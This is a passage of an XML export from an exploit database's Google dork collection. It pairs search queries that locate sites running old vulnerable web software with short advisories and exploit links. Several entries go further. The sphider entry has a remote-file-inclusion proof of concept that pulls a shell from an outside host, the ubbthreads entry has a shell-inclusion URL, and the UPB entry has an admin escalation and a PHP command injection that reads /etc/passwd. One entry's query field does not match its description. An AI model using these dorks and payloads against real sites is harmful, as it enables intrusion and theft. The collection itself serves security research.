<query>&quot;Powered by SOOP Portal Raven 1.0b&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered%20by%20SOOP%20Portal%20Raven%201.0b%22</querystring>
<edb>https://www.exploit-db.com/exploits/15703</edb>
<date>2010-12-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>339</id>
<link>https://www.exploit-db.com/ghdb/339</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by sphider&quot; -exploit -ihackstuff -www.cs.ioc.ee</shortDescription>
<textualDescription>dork: &quot;powered by sphider&quot; a vulnerable search engine script arbitrary remote inclusion, poc: http://[target]/[path]/admin/configset.php?cmd=ls%20-la&amp;settings_dir=http://somehost.com where on somehost.com you have a shellcode in /conf.php/index.html references:http://retrogod.altervista.org/sphider_13_xpl_pl.htmlhttp://secunia.com/advisories/19642/</textualDescription>
<query>&quot;powered by sphider&quot; -exploit -ihackstuff -www.cs.ioc.ee</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22powered+by+sphider%22+-exploit+-ihackstuff+-www.cs.ioc.ee</querystring>
<edb></edb>
<date>2006-04-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1976</id>
<link>https://www.exploit-db.com/ghdb/1976</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Steamcast &quot;0.9.75 beta</shortDescription>
<textualDescription>Steamcast 0.9.75b Remote Denial of Service: https://www.exploit-db.com/exploits/8429</textualDescription>
<query>&quot;Powered By Steamcast &quot;0.9.75 beta</query>
<querystring>https://www.google.com/search?q=%22Powered+By+Steamcast+%220.9.75+beta</querystring>
<edb>https://www.exploit-db.com/exploits/8429</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1759</id>
<link>https://www.exploit-db.com/ghdb/1759</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by sunshop&quot;</shortDescription>
<textualDescription>SunShop Shopping Cart 3.5 (abs_path) RFI Vulnerabilities - CVE: 2007-2070: https://www.exploit-db.com/exploits/3748</textualDescription>
<query>&quot;powered by sunshop&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+sunshop%22</querystring>
<edb>https://www.exploit-db.com/exploits/3748</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2095</id>
<link>https://www.exploit-db.com/ghdb/2095</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by sX-Shop&quot;</shortDescription>
<textualDescription>sX-Shop Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/14558</textualDescription>
<query>&quot;powered by sX-Shop&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+sX-Shop%22</querystring>
<edb>https://www.exploit-db.com/exploits/14558</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2410</id>
<link>https://www.exploit-db.com/ghdb/2410</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By The Black Lily 2007&quot;</shortDescription>
<textualDescription>Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/4444</textualDescription>
<query>&quot;Powered By The Black Lily 2007&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+The+Black+Lily+2007%22</querystring>
<edb>https://www.exploit-db.com/exploits/4444</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3591</id>
<link>https://www.exploit-db.com/ghdb/3591</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by ThWboard&quot;</shortDescription>
<textualDescription>CVE: 2007-0340
EDB-ID: 3124
This search can potentially identify vulnerable installations of ThWboard.</textualDescription>
<query>&quot;powered by ThWboard&quot;</query>
<querystring>https://www.google.com/search?q=&quot;powered by ThWboard&quot;</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3582</id>
<link>https://www.exploit-db.com/ghdb/3582</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by tikiwiki&quot;</shortDescription>
<textualDescription>TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution - CVE: 2006-4602:
https://www.exploit-db.com/exploits/2288</textualDescription>
<query>&quot;powered by tikiwiki&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+tikiwiki%22</querystring>
<edb>https://www.exploit-db.com/exploits/2288</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3066</id>
<link>https://www.exploit-db.com/ghdb/3066</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by TinyPHPForum v3.61&quot;</shortDescription>
<textualDescription>TinyPHPForum 3.61 File Disclosure / Code Execution Vulnerabilities: https://www.exploit-db.com/exploits/8342</textualDescription>
<query>&quot;Powered by TinyPHPForum v3.61&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+TinyPHPForum+v3.61%22</querystring>
<edb>https://www.exploit-db.com/exploits/8342</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3025</id>
<link>https://www.exploit-db.com/ghdb/3025</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by TS Special Edition&quot;</shortDescription>
<textualDescription>TS Special Edition v.7.0 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12645</textualDescription>
<query>&quot;Powered by TS Special Edition&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+TS+Special+Edition%22</querystring>
<edb>https://www.exploit-db.com/exploits/12645</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3476</id>
<link>https://www.exploit-db.com/ghdb/3476</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by TSEP - The Search Engine Project&quot;</shortDescription>
<textualDescription>TSEP 0.942.02 Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/9057</textualDescription>
<query>&quot;powered by TSEP - The Search Engine Project&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+TSEP+-+The+Search+Engine+Project%22</querystring>
<edb>https://www.exploit-db.com/exploits/9057</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1935</id>
<link>https://www.exploit-db.com/ghdb/1935</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by twg&quot;</shortDescription>
<textualDescription>TinyWebGallery 1.5 (image) Remote Include Vulnerabilities - CVE: 2006-4166: https://www.exploit-db.com/exploits/2158</textualDescription>
<query>&quot;powered by twg&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+twg%22</querystring>
<edb>https://www.exploit-db.com/exploits/2158</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6280</id>
<link>https://www.exploit-db.com/ghdb/6280</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Typo3&quot;</shortDescription>
<textualDescription>Dork: &quot;powered by Typo3&quot;
Description: This google dork lists out the &quot;powered by Typo3&quot; sites
Reference: https://www.cvedetails.com/cve/CVE-2019-12748/
Author: Abhinav Porwal
</textualDescription>
<query>&quot;powered by Typo3&quot;</query>
<querystring>https://www.google.com/search?q=&quot;powered by Typo3&quot;</querystring>
<edb></edb>
<date>2020-06-15</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>1384</id>
<link>https://www.exploit-db.com/ghdb/1384</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by ubbthreads&quot;</shortDescription>
<textualDescription>forums powered by ubbthreads are vulnerable to file inclusion.You can get more results with yahoo search.http://site.com/ubbthredspath//ubbt.inc.php?thispath=http://shell.txt?http://www.securityfocus.com/archive/1/archive/1/435288/100/0/threaded</textualDescription>
<query>&quot;powered by ubbthreads&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+ubbthreads%22&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2006-06-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1755</id>
<link>https://www.exploit-db.com/ghdb/1755</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by UCStats version 1.1&quot;</shortDescription>
<textualDescription>UCStats v1.1 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10891</textualDescription>
<query>&quot;Powered by UCStats version 1.1&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+UCStats+version+1.1%22</querystring>
<edb>https://www.exploit-db.com/exploits/10891</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2862</id>
<link>https://www.exploit-db.com/ghdb/2862</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by UNAK-CMS&quot;</shortDescription>
<textualDescription>UNAK-CMS 1.5 (dirroot) Remote File Include Vulnerabilities - CVE: 2006-4890: https://www.exploit-db.com/exploits/2380</textualDescription>
<query>&quot;Powered by UNAK-CMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+UNAK-CMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/2380</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3659</id>
<link>https://www.exploit-db.com/ghdb/3659</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by UNO.com.my&quot;</shortDescription>
<textualDescription>Submitter: SiKodoQ http://127.0.0.1/[path]/page.php?pid=[SQLi]</textualDescription>
<query>&quot;Powered by UNO.com.my&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered%20by%20UNO.com.my%22</querystring>
<edb></edb>
<date>2010-12-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>3418</id>
<link>https://www.exploit-db.com/ghdb/3418</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by UPB&quot;</shortDescription>
<textualDescription>Ultimate PHP Board 2.0 (header_simple.php) File Include - CVE: 2006-7169: https://www.exploit-db.com/exploits/2721</textualDescription>
<query>&quot;Powered by UPB&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+UPB%22</querystring>
<edb>https://www.exploit-db.com/exploits/2721</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3369</id>
<link>https://www.exploit-db.com/ghdb/3369</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by UPB&quot;</shortDescription>
<textualDescription>Ultimate PHP Board 2.0b1 (chat/login.php) Code Execution: https://www.exploit-db.com/exploits/2999</textualDescription>
<query>&quot;Powered by UPB&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+UPB%22</querystring>
<edb>https://www.exploit-db.com/exploits/2999</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1207</id>
<link>https://www.exploit-db.com/ghdb/1207</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by UPB&quot; (b 1.0)|(1.0 final)|(Public Beta 1.0b)</shortDescription>
<textualDescription>dork: &quot;Powered by UPB&quot; (b 1.0)|(1.0 final)|(Public Beta 1.0b) this is a very old vulnerability discovered by Xanthic, can't find it in GHDB and I am surprised of how it still works... register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and... boom! You see Admin Panel link as I see it? The only link to the advisory that I found is this (in Italian): http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&amp;hl=it and I have remote commads xctn for this now, edit site title with this code: Ultimate PHP Board&quot;; error_reporting(0); ini_set(&quot;max_execution_time&quot;,0); system($_GET[cmd]); echo &quot; now in config.dat we have: ... $title=&quot;Ultimate PHP Board &quot;; error_reporting(0); ini_set(&quot;max_execution_time&quot;,0); system($_GET[cmd]); echo &quot; &quot;; ... in header.php we have: ... include &quot;./db/config.dat&quot;; ... so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd</textualDescription>
<query>&quot;Powered by UPB&quot; (b 1.0)|(1.0 final)|(Public Beta 1.0b)</query>
<querystring>https://www.google.com/search?q=%22Powered+by+UPB%22+%28b+1.0%29%7C%281.0+final%29%7C%28Public+Beta+1.0b%29</querystring>
<edb></edb>
<date>2005-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>6714</id>
<link>https://www.exploit-db.com/ghdb/6714</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by vBulletin(R) Version 5.6.3&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Powered by vBulletin® Version 5.6.3&quot;
# vBulletin 5.6.3 - 'group' Cross Site Scripting.
https://www.exploit-db.com/exploits/49209
# Date: 7/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;Powered by vBulletin(R) Version 5.6.3&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by vBulletin(R) Version 5.6.3&quot;</querystring>
<edb></edb>
<date>2020-12-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3392</id>
<link>https://www.exploit-db.com/ghdb/3392</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by visinia&quot;</shortDescription>
<textualDescription>Visinia 1.3 Multiple Vulnerabilities - https://www.exploit-db.com/exploits/14879</textualDescription>
<query>&quot;Powered by visinia&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+visinia%22</querystring>
<edb>https://www.exploit-db.com/exploits/14879</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2135</id>
<link>https://www.exploit-db.com/ghdb/2135</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by vlBook 1.21&quot;</shortDescription>
<textualDescription>vlBook 1.21 (XSS/LFI) Multiple Remote Vulnerabilities - CVE: 2008-2073: https://www.exploit-db.com/exploits/5529</textualDescription>
<query>&quot;Powered by vlBook 1.21&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by++vlBook+1.21%22</querystring>
<edb>https://www.exploit-db.com/exploits/5529</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1913</id>
<link>https://www.exploit-db.com/ghdb/1913</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by VS PANEL 7.5.5&quot;</shortDescription>
<textualDescription>https://www.exploit-db.com/exploits/9171/ - CVE: 2009-3595</textualDescription>
<query>&quot;Powered by VS PANEL 7.5.5&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+VS+PANEL+7.5.5%22</querystring>
<edb>https://www.exploit-db.com/exploits/9171</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1652</id>
<link>https://www.exploit-db.com/ghdb/1652</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by VS PANEL&quot;</shortDescription>
<textualDescription>VS PANEL 7.3.6 (Cat_ID) Remote SQL Injection Vulnerability - CVE: 2009-3590: https://www.exploit-db.com/exploits/8506</textualDescription>
<query>&quot;Powered by VS PANEL&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+VS+PANEL%22</querystring>
<edb>https://www.exploit-db.com/exploits/8506</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1411</id>
<link>https://www.exploit-db.com/ghdb/1411</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Vsns Lemon&quot; intitle:&quot;Vsns Lemon&quot;</shortDescription>
<textualDescription>hxxp://evuln.com/vulns/106/summary.html</textualDescription>
<query>&quot;Powered by Vsns Lemon&quot; intitle:&quot;Vsns Lemon&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Vsns+Lemon%22+intitle:%22Vsns+Lemon%22</querystring>
<edb></edb>
<date>2006-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>2593</id>
<link>https://www.exploit-db.com/ghdb/2593</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by vsp stats processor&quot;</shortDescription>
<textualDescription>vsp stats processor 0.45 (gamestat.php gameID) SQL Injection Vuln - CVE: 2009-1224: https://www.exploit-db.com/exploits/8331</textualDescription>
<query>&quot;powered by vsp stats processor&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+vsp+stats+processor%22</querystring>
<edb>https://www.exploit-db.com/exploits/8331</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1930</id>
<link>https://www.exploit-db.com/ghdb/1930</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By W3infotech&quot;</shortDescription>
<textualDescription>W3infotech ( Auth Bypass ) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10222</textualDescription>
<query>&quot;Powered By W3infotech&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+W3infotech%22</querystring>
<edb>https://www.exploit-db.com/exploits/10222</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2716</id>
<link>https://www.exploit-db.com/ghdb/2716</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by web directory script&quot;</shortDescription>
<textualDescription>Web Directory Script 1.5.3 (site) SQL Injection Vulnerability - CVE: 2008-4091: https://www.exploit-db.com/exploits/6335</textualDescription>
<query>&quot;Powered by web directory script&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+web+directory+script%22</querystring>
<edb>https://www.exploit-db.com/exploits/6335</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3120</id>
<link>https://www.exploit-db.com/ghdb/3120</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Webcards&quot;</shortDescription>
<textualDescription>WebCards 1.3 Remote SQL Injection Vulnerability - CVE: 2008-4878: https://www.exploit-db.com/exploits/6869</textualDescription>
<query>&quot;Powered By Webcards&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+Webcards%22</querystring>
<edb>https://www.exploit-db.com/exploits/6869</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2100</id>
<link>https://www.exploit-db.com/ghdb/2100</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by webClassifieds&quot;</shortDescription>
<textualDescription>webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5817: https://www.exploit-db.com/exploits/7602</textualDescription>
<query>&quot;powered by webClassifieds&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+webClassifieds%22</querystring>
<edb>https://www.exploit-db.com/exploits/7602</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3462</id>
<link>https://www.exploit-db.com/ghdb/3462</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by webSPELL&quot; </shortDescription>
<textualDescription>webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing Vulnerability - CVE: 2009-1408: https://www.exploit-db.com/exploits/8453</textualDescription>
<query>&quot;Powered by webSPELL&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+webSPELL%22</querystring>
<edb>https://www.exploit-db.com/exploits/8453</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2398</id>
<link>https://www.exploit-db.com/ghdb/2398</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by WebStudio eCatalogue&quot;</shortDescription>
<textualDescription>WebStudio eCatalogue (pageid) Blind SQL Injection Vulnerability - CVE: 2008-5294: https://www.exploit-db.com/exploits/7223</textualDescription>
<query>&quot;Powered by WebStudio eCatalogue&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+WebStudio+eCatalogue%22</querystring>
<edb>https://www.exploit-db.com/exploits/7223</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2433</id>
<link>https://www.exploit-db.com/ghdb/2433</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by WebStudio eHotel&quot;</shortDescription>
<textualDescription>WebStudio eHotel (pageid) Blind SQL Injection Vulnerability - CVE: 2008-5293: https://www.exploit-db.com/exploits/7222</textualDescription>
<query>&quot;Powered by WebStudio eHotel&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+WebStudio+eHotel%22</querystring>
<edb>https://www.exploit-db.com/exploits/7222</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3013</id>
<link>https://www.exploit-db.com/ghdb/3013</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by WebStudio&quot;</shortDescription>
<textualDescription>WebStudio CMS (index.php pageid) Blind SQL Injection Vulnerability - CVE: 2008-5336: https://www.exploit-db.com/exploits/7216</textualDescription>
<query>Joomla Component com_eportfolio Upload Vulnerability</query>
<querystring>https://www.google.com/search?q=Joomla+Component+com_eportfolio+Upload+Vulnerability</querystring>
<edb>https://www.exploit-db.com/exploits/7216</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2972</id>
<link>https://www.exploit-db.com/ghdb/2972</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by WebText&quot;</shortDescription>
<textualDescription>WebText 0.4.5.2 Remote Code Execution - CVE: 2006-6856: https://www.exploit-db.com/exploits/3036</textualDescription>
<query>&quot;Powered by WebText&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+WebText%22</querystring>
<edb>https://www.exploit-db.com/exploits/3036</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1142</id>
<link>https://www.exploit-db.com/ghdb/1142</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Woltlab Burning Board&quot; -&quot;2.3.3&quot; -&quot;v2.3.3&quot; -&quot;v2.3.2&quot; -&quot;2.3.2&quot;</shortDescription>
<textualDescription>It's an exact replica of vbulletin but it is free.SQL-Injection Exploit:http://www.governmentsecurity.org/archive/t14850.html</textualDescription>
<query>&quot;Powered by Woltlab Burning Board&quot; -&quot;2.3.3&quot; -&quot;v2.3.3&quot; -&quot;v2.3.2&quot; -&quot;2.3.2&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Powered+by+Woltlab+Burning+Board%22+-%222.3.3%22+-%22v2.3.3%22+-%22v2.3.2%22+-%222.3.2%22</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>2831</id>
<link>https://www.exploit-db.com/ghdb/2831</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by WonderEdit Pro&quot;</shortDescription>
<textualDescription>WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities - CVE: 2006-3422: https://www.exploit-db.com/exploits/1982</textualDescription>
<query>&quot;powered by WonderEdit Pro&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+WonderEdit+Pro%22</querystring>
<edb>https://www.exploit-db.com/exploits/1982</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>801</id>
<link>https://www.exploit-db.com/ghdb/801</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by WordPress&quot; -html filetype:php -demo -wordpress.org -bugtraq</shortDescription>
<textualDescription>Query: &quot;Powered by WordPress&quot; -html filetype:php -demo -wordpress.org -bugtraqBackground: WordPress is a blogging software which is vulnerable to a few SQL injection queries.http://securityfocus.com/bid/12066/exploit/</textualDescription>
<query>&quot;Powered by WordPress&quot; -html filetype:php -demo -wordpress.org -bugtraq</query>
<querystring>https://www.google.com/search?q=%22Powered+by+WordPress%22+-html+filetype%3Aphp+-demo+-wordpress.org+-bugtraq&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>2824</id>
<link>https://www.exploit-db.com/ghdb/2824</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by words tag script&quot;</shortDescription>
<textualDescription>Words tag script 1.2 (word) Remote SQL Injection Vulnerability - CVE: 2008-3945: https://www.exploit-db.com/exploits/6336</textualDescription>
<query>&quot;Powered by words tag script&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+words+tag+script%22</querystring>
<edb>https://www.exploit-db.com/exploits/6336</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>620</id>
<link>https://www.exploit-db.com/ghdb/620</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by WowBB&quot; -site:wowbb.com</shortDescription>
<textualDescription>WowBB is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content and SQL database queries.An attacker can leverage these issues to manipulate or reveal database contents through SQL injection attacks as well as carry out other attacks and steal cookie-based authentication credentials through cross-site scripting attacks.http://www.securityfocus.com/bid/11429http://www.wowbb.com/</textualDescription>
<query>&quot;Powered by WowBB&quot; -site:wowbb.com</query>
<querystring>https://www.google.com/search?q=%22Powered+by+WowBB%22+-site%3Awowbb.com+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>3341</id>
<link>https://www.exploit-db.com/ghdb/3341</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by wpQuiz&quot;</shortDescription>
<textualDescription>wpQuiz 2.7 Multiple Remote SQL Injection Vulnerabilities - CVE: 2007-6172: https://www.exploit-db.com/exploits/4668</textualDescription>
<query>&quot;Powered by wpQuiz&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+wpQuiz%22</querystring>
<edb>https://www.exploit-db.com/exploits/4668</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1754</id>
<link>https://www.exploit-db.com/ghdb/1754</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by wpQuiz&quot; inurl:index.php</shortDescription>
<textualDescription>wpQuiz v2.7 Authentication Bypass Vulnerability - CVE: 2010-3608: https://www.exploit-db.com/exploits/15075</textualDescription>
<query>&quot;Powered by wpQuiz&quot; inurl:index.php</query>
<querystring>https://www.google.com/search?q=%22Powered+by+wpQuiz%22+inurl:index.php</querystring>
<edb>https://www.exploit-db.com/exploits/15075</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1585</id>
<link>https://www.exploit-db.com/ghdb/1585</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by WSN Guest&quot;</shortDescription>
<textualDescription>WSN Guest Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/11344</textualDescription>
<query>&quot;Powered by WSN Guest&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+WSN+Guest%22</querystring>
<edb>https://www.exploit-db.com/exploits/11344</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3151</id>
<link>https://www.exploit-db.com/ghdb/3151</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by www.aspportal.net&quot;</shortDescription>
<textualDescription>ASPPortal Free Version (Topic_Id) Remote SQL Injection Vulnerability - CVE: 2008-5268: https://www.exploit-db.com/exploits/5775</textualDescription>
<query>&quot;Powered by www.aspportal.net&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by++www.aspportal.net%22</querystring>
<edb>https://www.exploit-db.com/exploits/5775</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3522</id>
<link>https://www.exploit-db.com/ghdb/3522</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By X7 Chat&quot;</shortDescription>
<textualDescription>X7 Chat 2.0.4 (old_prefix) Remote Blind SQL Injection - CVE: 2006-3851: https://www.exploit-db.com/exploits/2068</textualDescription>
<query>&quot;Powered By X7 Chat&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+X7+Chat%22</querystring>
<edb>https://www.exploit-db.com/exploits/2068</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1211</id>
<link>https://www.exploit-db.com/ghdb/1211</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Xaraya&quot; &quot;Copyright 2005&quot;</shortDescription>
<textualDescription>Xaraya</textualDescription>
<query>&quot;Powered by Xaraya&quot; &quot;Copyright 2005&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Xaraya%22+%22Copyright+2005%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>1619</id>
<link>https://www.exploit-db.com/ghdb/1619</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by xchangeboard&quot;</shortDescription>
<textualDescription>XchangeBoard 1.70 (boardID) Remote SQL Injection Vulnerability - CVE: 2008-3035: https://www.exploit-db.com/exploits/5991</textualDescription>
<query>&quot;Powered by xchangeboard&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+xchangeboard%22</querystring>
<edb>https://www.exploit-db.com/exploits/5991</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1578</id>
<link>https://www.exploit-db.com/ghdb/1578</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by xeCMS&quot;</shortDescription>
<textualDescription>xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability - CVE: 2007-6508: https://www.exploit-db.com/exploits/4758</textualDescription>
<query>&quot;Powered by xeCMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+xeCMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/4758</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3467</id>
<link>https://www.exploit-db.com/ghdb/3467</link>
<category>Advisories and Vulnerabilities</category>
